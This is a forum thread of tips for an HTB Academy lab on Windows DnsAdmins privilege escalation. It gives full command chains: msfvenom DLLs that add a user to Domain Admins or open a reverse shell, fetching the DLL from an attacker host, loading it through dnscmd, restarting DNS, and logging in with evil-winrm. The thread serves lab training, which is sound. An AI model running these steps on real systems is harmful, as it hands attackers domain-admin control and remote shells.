HTB Academy: Windows Privilege Escalation DnsAdmins

logoff comand and conect back. That worked for me… lucky I remember this from some CTF

1 Like

Logout and login so changes can take affect.

2 Likes

Tips:

  1. Use sc.exe to start/stop services (sc start … won’t work)
  2. Logoff/Login, so changes take affect (you can use “shutdown /l”)

Another thing to pay attention to for anyone still stuck here:
Once you log into the target machine, your default path is

C:\Users\netadm

So when you retrieve your file using the command in the module

wget "http://10.10.14.3:7777/adduser.dll" -outfile "adduser.dll"

your .dll is copied to C:\Users\netadm\adduser.dll

The module then tells you to run the following command which assumes you moved it to Desktop, but this is not the case and CMD won’t tell you it cannot find the .dll

dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll

Simply remove the \Desktop part from the above path.

TL;DR double check you have the correct paths in your commands

This advice worked for me! Thanks so much dude!

Definitely not forgetting this lesson. I have been stuck on this one for hours now wondering what I did wrong.

msfvenom -p windows/x64/exec cmd=‘net group “domain admins” netadm /add /domain’ -f dll -o adduser.dll

use cmd not powershell
dnscmd.exe /config /serverlevelplugindll C:\Tools\adduser.dll

check if the dll is added
reg query \10.129.30.36\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

use sc.exe not sc
sc.exe stop dns

verify that it is actually stop
sc query dns

sc.exe start dns

restart the computer for the change to take effect
shutdown /l

verify that the user was added to the domain group
net group “Domain Admins” /dom

Get the flag
type c:\Users\Administrator\Desktop\DnsAdmins\flag.txt

evil-winrm -i 10.129.30.36 -u netadm -p “HTB_@cademy_stdnt!”

1 Like

nothing here will solve this machine because you cant restart dns
so i hope you will join this method
1-msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your_IP> LPORT=<Your_Port> -f dll -o malicious.dll
2-nc -nvlp
3-python3 -m http.server
4- wget http://<Your_IP>:8000/malicious.dll -o C:\Users\netadm\Desktop\malicious.dll
5-dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\malicious.dll
6-sc.exe stop dns
7-sc.exe start dns

I tried spawning a reverse shell, and even tho I did get the shell, it was extremely unstable. I was not able to navigate the file system.

As mentioned in the previous answers, using the course’s payload should suffice.
Bear in mind that you should execute pretty much all commands (except the PS cmdlets ones) from the command line utility. I first tried to run everything from Powershell, and it did not work. It’s quite misleading actually, because you won’t know you’re doing something wrong. You will get Access Denied, but when starting and stopping the DNS service, nothing will show up. That’s when I realized something was off and switched back to the command-line utility.

Also, you will notice there are a bunch of files in *C:\Tools*, including a dump of NTDS.dit and even that adduser.dll payload. I did not use any of those files. I used my own payload from msfvenom and retrieved it from the target via wget.

Finally, once you start the DNS service back up, you done. Establish a connection via evil-winrm and that’s all. Do not restart the machine, do not log off. Do not try to delete the key. That is not necessary to complete that lab.